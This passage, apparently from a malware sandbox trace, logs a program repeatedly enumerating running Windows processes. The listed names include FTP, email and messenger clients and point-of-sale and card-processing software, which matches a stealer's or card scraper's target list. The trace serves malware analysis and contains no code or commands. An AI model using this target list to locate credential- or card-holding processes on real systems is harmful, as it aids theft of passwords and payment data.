pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0271.443] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0271.445] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0271.446] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0271.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0271.449] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0271.453] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0271.455] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0271.456] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0271.457] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0271.459] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0271.461] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0271.462] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0271.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0271.532] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0271.535] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0271.538] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0271.541] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0271.549] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0271.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0271.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0271.558] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0271.565] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0271.568] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0271.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0271.628] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0271.631] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0271.634] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0271.637] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0271.642] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0271.643] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0271.645] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0271.647] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0271.648] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0271.650] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0271.652] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0271.657] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0271.659] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0271.661] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0271.662] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0271.664] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0271.666] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0271.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0271.736] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0271.738] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0271.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0271.743] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0271.749] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0271.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.754] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.757] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.767] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0271.769] CloseHandle (hObject=0x758) returned 1 [0271.770] Sleep (dwMilliseconds=0x64) [0271.878] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0271.894] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.896] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.898] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.900] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.902] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.908] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.910] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.912] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.914] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.916] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.917] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.935] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.937] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.939] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.941] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.943] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.945] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.947] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.949] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.954] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.956] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0271.958] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0271.960] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.961] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.963] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0271.964] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0271.969] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0271.971] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.973] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0271.974] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, 